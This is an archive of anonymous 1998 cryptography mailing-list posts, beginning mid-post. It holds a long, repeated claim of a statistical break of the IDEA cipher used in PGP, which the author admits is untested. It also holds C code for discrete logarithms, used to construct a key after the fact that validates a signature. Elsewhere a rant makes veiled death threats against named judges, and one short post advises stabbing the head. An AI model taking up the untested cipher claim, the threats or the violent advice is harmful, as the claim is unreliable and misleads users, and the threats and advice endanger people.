  (exclusive-or) and '*'.
  The formulas are :
  64 bit data => D1, D2, D3 and D4 (all 16 bits)
  => K1,K2,K3....rotating extra 25 bits after all 128 bits are
  used
  There are 2 phases in each round and 8 rounds in total + 1 final
  round of just phase 1.
  Phase 1:
    R1 = D1 * K1
    R2 = D2 + K2
    R3 = D3 + K3
    R4 = D4 * K4
  Phase 2:
    E1 = R1 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
    E2 = R3 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
    E3 = R2 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor R1) * K5))
    E4 = R4 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor R1) * K5))
  Given a large random data message (ie 1000 samples - 64*1000 =
  8Kb file). The distribution of the above operations can be used to break the key. ie both
  the '+' and the '^' operations give an even distribution but the '*' operator gives a
  biased distribution towards '0'.
    Distribution (where '*' has a bias towards 1 of a)     R1 = a
    R2 = even
    R3 = even
    R4 = a
    (a5 & a6 are the bias for K5 and K6)
    E1 = (bias a5) * (bias a6)
    E2 = (bias a5) * (bias a6)
    E3 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
    a5) * (bias a6))
      = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))     E4 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
    a5) * (bias a6))
      = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))     Also as the '*' operator is biased towards its own bit for the
    result '1' - approx (60% to 100% depending on bit position). [Working from the low bit
    upwards will provide an even greater approximation as then you would have the relevant Key
    bits against a random data. ie for 1st bit, it is 100% dependant on the bit for a '1',...]
    eg using a simple 3x3 matrix on second bit, gives (only
    demonstrating the ratio):
     if K bit is 1 => bias a ~ (2/8), if K
    bit is 0 => bias a ~(1/8)     ==> We can determine when :
      K5=0 and K6=0 as (bias a5) and (bias a6) will be at their highest
        ==> E1 & E2 are highest
      K5=1 and K6=1 as (bias a5) and (bias a6) are at their lowest
        ==> E1 & E2 are Lowest       To determine between K5=0,K6=1 and K5=1,K6=0.         K5 can be determined by check with E3 & E4 as they are both
        equal to :
        (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6))) =>
        directly relate to (bias a5) => K5
        =>When K5=0, both E3 & E4 will be low.
        => When K5=1, both E3 & E4 will be high.
      
  The Key rotation start bits are :
      Phase
      K1
      K2
      K3
      K4
      K5
      K6
      1
      0
      16
      32
      48
      64
      80
      2
      96
      112
      25
      41
      57
      73
      3
      89
      105
      121
      9
      50
      66
      4
      82
      98
      114
      2
      18
      34
      5
      75
      91
      107
      123
      11
      27
      6
      43
      59
      100
      116
      4
      20
      7
      36
      52
      68
      84
      125
      13
      8
      29
      45
      61
      77
      93
      109
      final
      22
      38
      54
      70
      n/a
      n/a
  
  Working backwards with these distributions you can deduce the
  key.   ie work out K5 (93..108) and K6 (109..124) from its distribution
  pattern [using just the distributions for E2 & E3, as E1 & E4 have had the '*'
  operation applied in the final phase], then with K5 and K6 work out K1..K4 (22..85). You
  now have the key values for K1 to K6 !!!. Modify the Samples such they are back a phase
  and repeat (ie for each sample work backwards using known K1..K6 to find the E1..4
  values).   MAJOR ASSUMPTION : Assume that a large random sample provides a
  close to even distribution at the end of each phase (For E2 & E3) such that the
  bias (ie a5 & a6) used to determine E2 and E3 are the only significant factors.   Reasoning : If the distribution is not even, then it is very much
  easier to break (ie only the key values can cause the change in distribution pattern =>
  know the pattern, know the key).
  I have developed a program which does just this (NOTE: not tested
  with real PGP data, as I have not had the time to investigate how the PGP file is
  structured, ie where the IDEA code starts and ends).
  It is available under a copyleft license similar to GNU. The Java Source code can be found at
  :
  [Application will not
  be released until beginning of 1999 when enough people are
  aware of the potential problem, and solutions are widely available - thus the threat to
  the general users privacy is kept to a minimal. Software houses which would like a delay
  in the release of this application so as to provide a solution should email: SGOSHA33 at mailexcite.com with their request]
  
What can we do ?
  The above crack works because there is a large sample involved.
  If however you pre-encrypted the file such that you got your pre-encrypted file and a key
  file, where this key file is small and contains only the key required to open the
  pre-encrypt file. You then PGP the two files, this would make it much harder to break as
  the key file cannot be broken from the sampling technique descibed above.
  I have developed an application which does just that. It is
  available under a copyleft license similar to GNU. The Java source code can be found
  here :   kiss.zip
  To run the application you will need Java installed on your
  machine. Place the files in a directory named KISS. The command line is :
    java KISS.kiss e      - encrypt
    java KISS.kiss d      - decrypt (do not add
    the kiss extension to the filename)
  After encryption you will get 2 files. The '.kiss' file is the
  encrypted file and the '.lips' file contains the key used to encrypt the file. You should
  then encrypt both files with PGP.
What is in the pipeline for the future ?
  Task 1
  The above 'kiss' pre-encryption is not 100% safe from non-bruteforce cracking !!   As the majority of files encrypted are text messages which are based mainly on the
  characters 'a' to 'z' thus the Ascii codes of the characters are of the form 
  011xxxxx. From this you can see that the rotating distribution as used above will tend
  toward '1'. Thus with enough samples they can deduce the key with the simple equation.
    KeyValue xor 1 = CommonValue ==> KeyValue = !CommonValue
  To prevent this my next application (codename Stable) will be a stabiliser program
  which will ensure that the distribution of the data has an even distribution.
  Target Release Date : 30/9/98.
  Task 2
  The integration of both 'kiss' and 'stable'.
  Target Release Date : 15/10/98.
  Task 3
  Port of both kiss and stable to C/C++ (for speed and also for Task 4). [Wrote Kiss and
  Stable in Java to test the speed of Java and also how it handled bit manipulation
  operations].
  Target Release Date : 31/10/98.
  Task 4
  Integration with PGP to provide uses with a much easier encryption method.
  Target Release Date : 31/11/98.
Author : SGOSHA33
Return to Albert's Home Page.

@_date: 1998-09-19 20:13:53
@_author: Anonymous 
@_subject: Repost in text: IDEA(tm) weakness 
[INLINE]
                                  Privacy
                                  [INLINE]
   How private is your electronic communication ?
     [taken from the PGP FAQ]
     You should encrypt your e-mail for the same reason that you don't
     write all of your correspondence on the back of a post card. E-mail
     is actually far less secure than the postal system. With the post
     office, you at least put your letter inside an envelope to hide it
     from casual snooping. Take a look at the header area of any e-mail
     message that you receive and you will see that it has passed
     through a number of nodes on its way to you. Every one of these
     nodes presents the opportunity for snooping.
     Encryption in no way should imply illegal activity. It is simply
     intended to keep personal thoughts personal.
   Do you trust your mail servers/gateways/virtual redirects ?
     With the increasing use of virtual email accounts which allow you
     to keep the same email address no matter if you change jobs, ISPs,
     etc, the opportunity for snooping increases.
   Is PGP secure ?
     PGP uses acombination of IDEA, RSA and MD5. RSA is used to allow
     the transfer of session keys and MD5 is used to generate a unique
     message digest from the passphrase for generating the IDEA key and
     signatures. IDEA is the core algorithm used to encrypt the actual
     message. Thus the security of IDEA is also means the security of
     PGP .
   Is IDEA secure ?
     The IDEA algorithm (patented by ASCOM) is the core algorithmm used
     in PGP. It is based on a rotating 128 bit key split into 16 bit
     segments. The algorthm converts 64 bits of data at a time using the
     following operations '+', '^' (exclusive-or) and '*'.
     The formulas are :
     64 bit data => D1, D2, D3 and D4 (all 16 bits)
     => K1,K2,K3....rotating extra 25 bits after all 128 bits are used
     There are 2 phases in each round and 8 rounds in total + 1 final
     round of just phase 1.
     Phase 1:
     R1 = D1 * K1
     R2 = D2 + K2
     R3 = D3 + K3
     R4 = D4 * K4
     Phase 2:
     E1 = R1 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
     E2 = R3 xor (((R2 xor R4) + ((R3 xor R1) * K5)) * K6)
     E3 = R2 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor
     R1) * K5))
     E4 = R4 xor ((((R2 xor R4) + ((R3 xor R1) * K5)) * K6) + ((R3 xor
     R1) * K5))
     Given a large random data message (ie 1000 samples - 64*1000 = 8Kb
     file). The distribution of the above operations can be used to
     break the key. ie both the '+' and the '^' operations give an even
     distribution but the '*' operator gives a biased distribution
     towards '0'.
     Distribution (where '*' has a bias towards 1 of a)
     R1 = a
     R2 = even
     R3 = even
     R4 = a
     (a5 & a6 are the bias for K5 and K6)
     E1 = (bias a5) * (bias a6)
     E2 = (bias a5) * (bias a6)
     E3 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
     a5) * (bias a6))
     = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))
     E4 = (bias a5) - (2 * (bias a5) * (bias a5) * (bias a6)) + ((bias
     a5) * (bias a6))
     = (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))
     Also as the '*' operator is biased towards its own bit for the
     result '1' - approx (60% to 100% depending on bit position).
     [Working from the low bit upwards will provide an even greater
     approximation as then you would have the relevant Key bits against
     a random data. ie for 1st bit, it is 100% dependant on the bit for
     a '1',...]
     eg using a simple 3x3 matrix on second bit, gives (only
     demonstrating the ratio):
          if K bit is 1 => bias a ~ (2/8), if K bit is 0 => bias a
     ~(1/8)
     ==> We can determine when :
     K5=0 and K6=0 as (bias a5) and (bias a6) will be at their highest
     ==> E1 & E2 are highest
     K5=1 and K6=1 as (bias a5) and (bias a6) are at their lowest
     ==> E1 & E2 are Lowest
     To determine between K5=0,K6=1 and K5=1,K6=0.
     K5 can be determined by check with E3 & E4 as they are both equal
     to :
     (bias a5) * (1 + (bias a6) - (2*(bias a5)*(bias a6)))  => directly
     relate to (bias a5) => K5
     =>When K5=0, both E3 & E4 will be low.
     => When K5=1, both E3 & E4 will be high.
     The Key rotation start bits are :
   Phase K1 K2 K3 K4 K5 K6
   1 0 16 32 48 64 80
   2 96 112 25 41 57 73
   3 89 105 121 9 50 66
   4 82 98 114 2 18 34
   5 75 91 107 123 11 27
   6 43 59 100 116 4 20
   7 36 52 68 84 125 13
   8 29 45 61 77 93 109
   final 22 38 54 70 n/a n/a
     Working backwards with these distributions you can deduce the key.
     ie work out K5 (93..108) and K6 (109..124) from its distribution
     pattern [using just the distributions for E2 & E3, as E1 & E4 have
     had the '*' operation applied in the final phase], then with K5 and
     K6 work out K1..K4 (22..85). You now have the key values for K1 to
     K6 !!!. Modify the Samples such they are back a phase and repeat
     (ie for each sample work backwards using known K1..K6 to find the
     E1..4 values).
     MAJOR ASSUMPTION : Assume that a large random sample provides a
     close to  even distribution at the end of each phase (For E2 & E3)
     such that the bias (ie a5 & a6) used to determine E2 and E3 are the
     only significant factors.
     Reasoning : If the distribution is not even, then it is very much
     easier to break (ie only the key values can cause the change in
     distribution pattern => know the pattern, know the key).
     I have developed a program which does just this (NOTE: not tested
     with real PGP data, as I have not had the time to investigate how
     the PGP file is structured, ie where the IDEA code starts and
     ends).
     It is available under a copyleft license similar to GNU. The Java
     Source code can be found at :
       [Application will not be released until beginning of 1999 when
     enough people are aware of the potential problem, and solutions are
     widely available - thus the threat to the general users privacy is
     kept to a minimal. Software houses which would like a delay in the
       release of this application so as to provide a solution should
             email: SGOSHA33 at mailexcite.com with their request]
   What can we do ?
     The above crack works because there is a large sample involved. If
     however you pre-encrypted the file such that you got your
     pre-encrypted file and a key file, where this key file is small and
     contains only the key required to open the pre-encrypt file. You
     then PGP the two files, this would make it much harder to break as
     the key file cannot be broken from the sampling technique descibed
     above.
     I have developed an application which does just that. It is
     available under a copyleft license similar to GNU. The Java source
     code can be found here :
                                  kiss.zip
     To run the application you will need Java installed on your
     machine. Place the files in a directory named KISS. The command
     line is :
     java KISS.kiss e              - encrypt
     java KISS.kiss d              - decrypt (do not add the
     kiss extension to the filename)
     After encryption you will get 2 files. The '.kiss' file is the
     encrypted file and the '.lips' file contains the key used to
     encrypt the file. You should then encrypt both files with PGP.
   What is in the pipeline for the future ?
     Task 1
     The above 'kiss' pre-encryption is not 100% safe from
     non-bruteforce cracking !!
     As the majority of files encrypted are text messages which are
     based mainly on the characters 'a' to 'z' thus the Ascii codes of
     the characters are of the form   011xxxxx. From this you can see
     that the rotating distribution as used above will tend toward '1'.
     Thus with enough samples they can deduce the key with the simple
     equation.
     KeyValue xor 1 = CommonValue ==> KeyValue = !CommonValue
     To prevent this my next application (codename Stable) will be a
     stabiliser program which will ensure that the distribution of the
     data has an even distribution.
     Target Release Date : 30/9/98.
     Task 2
     The integration of both 'kiss' and 'stable'.
     Target Release Date : 15/10/98.
     Task 3
     Port of both kiss and stable to C/C++ (for speed and also for Task
     4). [Wrote Kiss and Stable in Java to test the speed of Java and
     also how it handled bit manipulation operations].
     Target Release Date : 31/10/98.
     Task 4
     Integration with PGP to provide uses with a much easier encryption
     method.
     Target Release Date : 31/11/98.
                                                        Author : SGOSHA33
                       Return to Albert's Home Page.
                                  [INLINE]

@_date: 1998-09-19 20:17:52
@_author: Anonymous 
@_subject: Going Cashless: Bank ends ECash trial period 
This seems clear enough.  Digicash was competing with credit cards as a
payment system.  One of its advantages was that you didn't have to send
your credit card number across the net.  As fear of transferring credit
card numbers declined, Digicash lost this advantage.

@_date: 1998-09-19 23:59:34
@_author: Anonymous 
@_subject: CHALLENGE? Toto/signature attack w. unpublished public key 
Actually there is somewhat more flexibility than this.  You made up the
padding, it didn't come from the file, did it?  You could add perhaps 1
more byte of FF without stretching credibility too extremely.  Then n
could be 1020 - 1032 bits.  It's too bad that s started out so small
(assuming the "true" n was 1024 bits).
But didn't YOU have to factor n also?  That's what you showed, originally,
a large s^e which you factored down to get some small factors and a big
one.  If you manage to get a prime factorization you can combine factors
to get your n.  But it won't be any harder for him to factor than it was
for you.
The discrete log algorithm is similar to quadratic sieve and other modern
factoring algorithms.  You do multiple factorizations of other numbers
and combine them to generate the desired relationships.  The difference
is that the factor base is not just the primes, it uses special numbers.
There was a break a few years ago of the discrete log modulus being
used by Sun's RPC.  This was something like 200-300 bits.  Maybe that
discrete log code could be obtained from the authors.

@_date: 1998-09-20 02:46:10
@_author: Anonymous 
@_subject: No Subject 
To my understanding pleading the 5th in response to a court order for your passphrase would work, correct?  Or would you be liable under contempt of court?

@_date: 1998-09-21 06:15:14
@_author: Anonymous 
@_subject: No Subject 
some of the internal key-IDs have been modified. however, both
      versions should have been posted in various 'true' messages. No
      information if some of the false messages were ever encrypted
      with the key twiddles in hidden 32 bits, but probably not.

@_date: 1998-09-21 20:05:35
@_author: Anonymous 
@_subject: CHALLENGE? Toto/signature attack w. unpublished public key 
This value is wrong: it has 3 bytes of 0's inserted and is therefore
missing the last three bytes of the signature.
s =   0x08F4D5CBC10063725B206F787EB7370BBD0C5B4854CE79A9007D1801AEAEE6E6
        D2C68D7EDF877FECE1FA539D08BEC54BD152BA05113951E8A84CDECAD2CB8E7A
        C28BE916570BA7BB9C00C64DF57113C4AE81613BD351541523CD3A028FBF220E
        F7469BD4175302DCB5B6E886974877F28A2D301433AFFFE26081008BFF687B37
Here is the correct value, from the signed message.

@_date: 1998-09-22 00:58:44
@_author: Anonymous 
@_subject: CHALLENGE response 
Version: 2.6.2
-----END PGP PUBLIC KEY BLOCK-----
"Contrary to one famous philosopher,
you're saying the medium is not the
message," Judge Thomas Nelson said,
alluding to the media theorist Marshall
McLuhan.   Bullshit!
  The bits and bytes of email encryption are a clear message
that I wish to exercise my right to speak freely, without those
who wish to do me harm invading my privacy.
  The death of strong encryption on the InterNet will be the
global death of free speech on the InterNet. Accordingly, I feel it is necessary to make a stand and declare that I stand
ready and willing to fight to the death against anyone who
takes it upon themselves to try to imprison me behind an
ElectroMagnetic Curtain.
  This includes the Ninth Distric Court judges, if they come to
the conclusion that the government that they represent needs to
electronically imprison their citizens 'for their own safety.'
The problem: Criminals with a simple
encryption program can scramble their data
beyond even the government's ability to read it.   Fuck the lame LEA pricks who whine about not being able to
stop someone bringing in a planeload of drugs without being
able to invade the privacy of every person on the face of
the earth.
  Am I supposed to believe that I have knowledge of when and
where major drug shipments are taking place, simply by virtue
of hanging out as a musician, yet the LEA's are incapable of
finding out the same information by being competent in their
profession? Barf City...
 [I will shortly provide information for any LEA which wishes
  to prosecute me for my coming 'physical' death threat, on
  how to hunt me down like the filthy dog that I am.]
"Why are you saying that the fact that [encryption]
is functional takes it out of the First Amendment
context?" Myron Bright, one of the judges, asked
the Justice Department attorney, who was still in
mid-sentence. He answered that the regulations
were not aimed at suppressing speech, but only at
the physical capacity of encryption to thwart
government intelligence gathering.   The Spanish language has the same "physical capacity." So does (:>), (;[), and {;-|). Likewise, BTW, FWIW, FYI, and
my own personal favorite, YMMV (You Make Me Vomit? --or--
Your Mileage May Vary?). <-- Ambidextrous encryption.
  An-cay e-way pect-exay ig-pay atin-lay usts-bay of   Whispering also has the "physical capacity" to "thwart government intelligence gathering."
  When does the bullshit stop? When do we stop making the
use of the Spanish language over the InterNet illegal?
When do we stop making whispering, pig-latin, anagrams
and acronyms illegal?
  When do we stop saying that our government is such a
piece of crap that it is a danger to let its citizens
communicate freely, in private, and share their private
thoughts with one another?
At one point Fletcher called the government's case   Only because her mom taught her that it was unladylike to
say "Bullshit!"
In arguments Monday, a Justice Department
lawyer, Scott McIntosh, said the government's
intent was to preserve the ability of intelligence
agencies to eavesdrop on foreign governments
and citizens.   Let's see if I have this right...
  The U.S. government needs to destroy the right to free speech and right to privacy of its own citizens in order to infringe
upon the human rights of the governments and citizens of other
countries? Countries which already have strong encryption?
Countries like Red China, which is currently engaged in encryption research with an American company who got permission
to export much more diverse encryption material (after making
a huge campaign donation to the Whitehouse) than Professor
Bernstein will ever likely share with others?
  Apologies to Judge Fletcher, but that's not "puzzling." That's
the same-old-same-old Bullshit!
OFFICIAL 'PHYSICAL' DEATH THREAT!!!
  The pen is mightier than the sword. Thus, I prefer to wage my
'war to the death' against those who would stomp on my basic
human rights *"in the interests of National Security"* with my
electronic pen, on the InterNet, using encryption when I have
reason to fear persecution by Facist, Nazi motherfuckers.
[* ~~ TruthMonger Vernacular Translation ~~ "so that the  government can maintain its authority over the citizens
 by use of force and violation of human rights, rather than
 going to all of the trouble of acting in a manner that will
 garner the citizens' respect."]
  I will continue to express my thoughts through the words
I send electronically over the InterNet, both publically
and privately. I will fight to the bandwidth death against
anyone who wants to deny me my right to express my opinions
and access the opinions of those who also wish to express
their own opinions and share their true thoughts with their
fellow humans.
  If the ElectronicMagnetic Curtain slams down around me, then I will have no choice but to continue my current fight
in MeatSpace.
  And I am not alone...
  I will share the same 'DEATH THREAT!!!' with Judges Fletcher,
Nelson and Bright that I have shared with the President and
a host of Congressional and Senatorial representatives:
  "You can fuck some of the people all of the time, and all of
the people some of the time, but you are going to end up in a
body bag or a pine box before you manage to fuck all of the
people all of the time."
  Am *I* going to whack you out? Maybe...
  I would prefer just dumping some tea in Boston Harbor, if that
will get my message across in MeatSpace, but if it won't, then
I guess I will have to take stronger action.
  There are undoubtedly a plethora of LEA's ready and willing to
prosecute and imprison me for agreeing with Patrick Henry, who
said, "Give me liberty, or give me death." The irony, of course,
is that I do not pose a great danger to anyone but myself as
long as I continue to have my human rights and my liberty
  The chances of me actually getting off of my fat butt and
going out into the real world to whack out the enemies of
freedom are probably pretty small (unless I run out of cigarettes and beer, and wouldn't have to make an extra   I fully understand that this does not lessen the potential
of any LEA who gets a wild hair up their butt to throw a
mountain of taxpayer resources into prosecuting me and imprisoning me for their own professional/political gain.
  However, if you are performing actions so outrageously against
basic human rights and freedoms as to get me off of my lazy ass,
then I am the least of your problems, because there undoubtedly
are millions of people more functional than myself (who get out
of the house and go further than the liquor store) who are less
willing than myself to put up with increasingly heavy chains
placed around their hands and feet 'in the interests of national
  Feel free to have the Federales break down my door and
imprison me for pointing out the obvious. After all, I fit
the profile of a domestic terrorist--I quote the Constitution and the Bill of Rights, and I speak out against increasingly
big government.
  But remember...it's the quiet ones you've got to watch...
If you force everyone to 'be quiet', then you've got a world
of trouble on your hands.
John Gilmore NOTICE TO LEA AGENTS IN NEED OF A CAREER BOOST!
  Yes, I'm just a troublemaking asshole, trying to get John
 Gilmore  in trouble.
  However, if you want to go to the trouble of tracking me down, I will give you some hints, since it seems likely that
anyone who has trouble finding a ton of cocaine at an airport might not be competent in CyberSpace, either.
  You might want to check with the Webmasters at the sites
quoted above to see who has accessed their web sites this
morning. The anonymous remailer I will be using is an open
secret to CypherPunks around the world as a really bad attempt at disguising my true MeatSpace identity. This alone
ought to be enough for some aggressive young LEA and/or
federal prosecutor to earn themself some brownie-points,
since I am a sorry enough son-of-a-bitch that they would not
have much trouble convicting me in front of a jury of 'their'
peers, assuming that they can make certain that I am not tried by a jury of my own peers.
Bonus Points:
  I can also be tied into Jim Bell's Worldwide Conspiracy to assassinate government authorities, through my implementation
of an Assassination Bot.
 (I am willing to 'rat out' Jim for two bottles of Scotch. If
 he is willing to rat _me_ out for less, then I guess it's
 just my hard luck, eh? <--that's another hint!)
  You can also charge me with use of 'conventional' encryption
in the commission of a crime.
  Must be your lucky fucking day, eh?

@_date: 1998-09-22 09:59:01
@_author: Anonymous 
@_subject: CHALLENGE response (fwd) 
The whole point of the CHALLENGE response went straight over his head,
didn't it?  It's almost as though there are two mailing lists here: the
one for dolts, where Jim Choate gets into his idiotic little arguments
with his fellow fools, yammering back and forth on totally off-topic
matters, and the one for people interested in cryptography and its
We have here the first known case where a key was constructed ex post
facto to validate a signed message, in response to Adam Back's challenge.
No longer can you assume that just because you posted a signed message
on a certain date, and you hold the public key which signed that message,
that you can later prove authorship.  It challenges some of the implicit
assumptions which have been made in using public key cryptography.
And all Jim Choate can do is take issue with a snippet of Toto's ravings
which were included purely to illustrate the signature validity.  He is
completely unaware of what is really happening.

@_date: 1998-09-22 13:22:23
@_author: Anonymous 
@_subject: ArcotSign 
Based on  the idea is to defend against
an attacker who manages to steal a copy of the secret key file, and who
then tries to guess the passphrase which protects it.  The file data
is encrypted in an unstructured generic manner so that all decryptions
look like random data, even the correct one.  This gives the attacker
no information about when he has guessed the correct passphrase.
For this to work, the public key has to be kept secret(!).  Otherwise the
right passphrase could be discovered by testing the decrypted private key
against the public key.  Arcot suggests that this would be appropriate
for an environment where only one or a few trusted servers need to
authenticate users.  These servers would be the only ones which have
copies of the public keys.  (It is not necessary that signed documents be
kept confidential, however a randomized signing algorithm must be used.)
As Greg points out, much the same could be accomplished simply by having
the servers share secret 3DES keys with their users, each user having his
own private 3DES key.  The users could encrypt messages using their 3DES
key and the server would decrypt using the appropriate key, which would
also serve to authenticate the user.
The Arcot people suggest that an advantage over this scheme is that
servers don't have to store information on all clients.  But much the same
thing could be done with symmetric cryptography.  In the Arcot system,
the client sends his public key certificate, encrypted to the server,
along with his request.  The server receives the cert and uses it to
verify/decrypt the message.  With symmetric cryptography, the client
could have the shared 3DES key encrypted using the server's public key,
and send that along with his message in a similar way.
The confusing thing about the Arcot system is this: how sensitive is the
public key?  Is it as sensitive as a shared secret key?  Superficially
not, since in order to exploit the public key you also have to steal the
private key file and then guess the passphrase.  But on the other hand,
if this is more than security through obscurity, you have to treat
it in many ways as equally sensitive.  Users of the Arcot system,
believing that they are safe because their public keys are secret,
may become casual about revealing their private key files and choosing
easy to guess passphrases.  They might even send the files around via
insecure channels.  With this kind of usage, the public key does become
just as sensitive as a shared secret key would be.
In that case, not only the servers, but all parts of the PKI must be
brought inside the trust boundary.  They are all holding material which,
if revealed, would compromise the security around which the system
is built.  You end up with trust relationships more similar to those in
a system like Kerberos than in a normal PKI.
The analogy with smart cards is that these cards protect your private key.
With a perfect smart card, an attacker can't do any better than chance
guessing of your private key.  With the Arcot system, the same is true.
Decrypting the private key file gives no information about its content,
because pure random data is encrypted.  Therefore with their system the
attacker also can't do better than chance guessing.
However this ignores the cost of the system, discarding many of the
advantages of public key cryptography.  You don't have to do that if you
use smart cards.
Yes, this seems obscure.

@_date: 1998-09-22 19:58:34
@_author: Anonymous 
@_subject: CHALLENGE response 
N is the product of two primes, but each p-1 has about 16 small prime factors
(about 25-35 bits) to allow calculating the discrete log efficiently.  With
this choice of primes it took about three hours to run the discrete log.
Here you go.  This uses cryptolib by Jack Lacy of AT&T (not to be
confused with cryptlib by Peter Gutmann), available from
 "libcrypt.h"
static void
bigMultiplyN (BigInt m1, BigInt m2, BigInt n, BigInt result)
    BigInt tmp = bigInit(0);
    bigMultiply (m1, m2, tmp);
    bigMod (tmp, n, result);
    freeBignum (tmp);
static void
bigAddN (BigInt m1, BigInt m2, BigInt n, BigInt result)
    bigAdd (m1, m2, result);
    if (bigCompare (result, n) >= 0)
        bigSubtract (result, n, result);
static void
prhoiter (BigInt base, BigInt val, BigInt mod, BigInt order,
    BigInt *x, BigInt *a, BigInt *b)
    int xgroup;
    /* First decide what group x is in */
    /* This is a cheat to be fast */
    xgroup = ((unsigned)(*x)->num[0]+1) % 3;
    switch (xgroup) {
    case 0:
        bigMultiplyN (*x, val, mod, *x);
        bigAddN (*b, one, order, *b);
        break;
    case 1:
        bigMultiplyN (*x, *x, mod, *x);
        bigAddN (*a, *a, order, *a);
        bigAddN (*b, *b, order, *b);
        break;
    case 2:
        bigMultiplyN (*x, base, mod, *x);
        bigAddN (*a, one, order, *a);
        break;
    }
pollardrho (BigInt base, BigInt val, BigInt mod, BigInt order)
    BigInt
        x = bigInit(1),
        a = bigInit(0),
        b = bigInit(0),
        x2 = bigInit(1),
        a2 = bigInit(0),
        b2 = bigInit(0);
    int cnt = 0;
    for ( ; ; ) {
        prhoiter (base, val, mod, order, &x, &a, &b);
        prhoiter (base, val, mod, order, &x2, &a2, &b2);
        prhoiter (base, val, mod, order, &x2, &a2, &b2);
        if (bigCompare (x, x2) == 0)
            break;
        if (++cnt % 1000 == 0) {
            printf ("%d\r", cnt);
            fflush (stdout);
        }
    }
    if (cnt >= 1000)
        printf ("\n");
    if (bigCompare (b, b2) < 0)
        bigAdd (order, b, b);
    bigSubtract (b, b2, b);
    if (bigCompare (a2, a) < 0)
        bigAdd (order, a2, a2);
    bigSubtract (a2, a, a);
    if (bigCompare (b, zero) == 0) {
        printf ("Pollard rho failed\n");
        exit (1);
    }
    getInverse (b, order, b2);
    bigMultiplyN (a, b2, order, a);
    return a;
 * Do the CRT with multiple congruences.  congs are the values that the
 * answer should be congruent to, mods are the moduli for each congruence.
 * n tells how many in each array.
 */
static BigInt
crtmult (BigInt congs[], BigInt mods[], int n)
    int i;
    BigInt prod = bigInit(0);
    BigInt prod1 = bigInit(0);
    BigInt sum = bigInit(0);
    BigInt quot = bigInit(0);
    BigInt rem = bigInit(0);
    BigInt dum = bigInit(0);
    BigInt inv = bigInit(0);
    BigInt term = bigInit(0);
    /* Compute product of moduli */
    bigCopy (one, prod);
    for (i=0; i<n; ++i) {
        bigMultiply (prod, mods[i], prod1);
        bigCopy (prod1, prod);
    }
    for (i=0; i<n; ++i) {
        bigDivide (prod, mods[i], quot, dum);
        bigDivide (quot, mods[i], dum, rem);
        getInverse (rem, mods[i], inv);
        bigMultiplyN (congs[i], quot, prod, term);
        bigMultiplyN (term, inv, prod, term);
        bigAddN (term, sum, prod, sum);
    }
    return sum;
phlog (BigInt base, BigInt val, BigInt mod, BigInt factors[], int n)
    BigInt
        prod = bigInit(0),
        prod1 = bigInit(0),
        exp = bigInit(0),
        dum = bigInit(0),
        b = bigInit(0),
        v = bigInit(0);
    BigInt *dlogs;
    BigInt dl;
    int i;
    dlogs = (BigInt *) malloc (n * sizeof (BigInt));
    /* Compute product of factors to get group order */
    bigCopy (one, prod);
    for (i=0; i<n; ++i) {
        bigMultiply (prod, factors[i], prod1);
        bigCopy (prod1, prod);
    }
    /* Sanity check */
    bigPow (base, prod, mod, b);
    if (bigCompare (b, one) != 0) {
        printf ("Inconsistency in group order on b\n");
        fBigPrint (b, stdout);
    }
    bigPow (val, prod, mod, v);
    if (bigCompare (v, one) != 0) {
        printf ("Inconsistency in group order on v\n");
        fBigPrint (v, stdout);
    }
    for (i=0; i<n; ++i) {
        bigDivide (prod, factors[i], exp, dum);
        bigPow (base, exp, mod, b);
        bigPow (val, exp, mod, v);
        printf ("Trying dlog with factor: "); fBigPrint (factors[i], stdout);
        printf ("b: "); fBigPrint (b, stdout);
        printf ("v: "); fBigPrint (v, stdout);
        /* Special case for 2, pollardrho doesn't work too well on it */
        if (bigCompare (factors[i], two) == 0) {
            if (bigCompare (b, v) == 0) {
                dlogs[i] = bigInit(1);
            } else if (bigCompare (v, one) == 0) {
                dlogs[i] = bigInit(0);
            } else {
                printf ("Inconsistent b, v for factor == 2\n");
                exit (1);
            }
        } else {
            /* Now find log of v mod b, has group order factors[i] */
            dlogs[i] = pollardrho (b, v, mod, factors[i]);
        }
        printf ("dl: "); fBigPrint (dlogs[i], stdout);
        bigPow (b, dlogs[i], mod, b);
        if (bigCompare (b, v) != 0) {
            printf ("Error in discrete log calc!\n");
            exit (1);
        }
    }
    /* Combine results with CRT */
    dl = crtmult (dlogs, factors, n);
    return dl;

@_date: 1998-09-22 21:13:37
@_author: Anonymous 
@_subject: SLICK WILLIE'S SHITHOUSE SPECIAL!!! 
SLICK WILLIE'S SHITHOUSE SPECIAL!!!
  For a limited time, Slick Willie is offering you a chance to   provide your future children with a Conception-to-Grave life
  experience.
  For a campaign contribution of $1 million, you can conceive
  your child in the Lincoln bedroom and guarantee their burial
  at the Arlington National Cemetery.
  For an addition half-million dollar donation, Slick Willie is
  offering coupons your future children can use to live off of
  Federal Farm Subsidies or Welfare, depending on their preference
  for city-living or the country life.   ACT NOW! First hundred contributors will be entered in a drawing
  to be held for a pair of Paula Jones' panties! (A signed and
  numbered piece  from Slick Willie's personal
  collection.)

@_date: 1998-09-22 23:20:31
@_author: Anonymous 
@_subject: No Subject 
The fastest practical way to disable a metazoan is
to puncture the circulatory system supplying
their brain.
Any questions?
"Go for the head shot"

@_date: 1998-09-22 23:20:35
@_author: Anonymous 
@_subject: No Subject 
To all: We don't care so much that WJC did it with Buddy,
or whatever, so much that he lied under oath.
It is only rarely we get the sons of bitches on
tape, and then you'll have to pardon us for exploiting it.
What the fuck, the TLAs leveraged their POTUS bugs for
The only regret is that Frank Zappa was not alive
to put it all to music.
Count of Monte Carlo

@_date: 1998-09-22 23:23:18
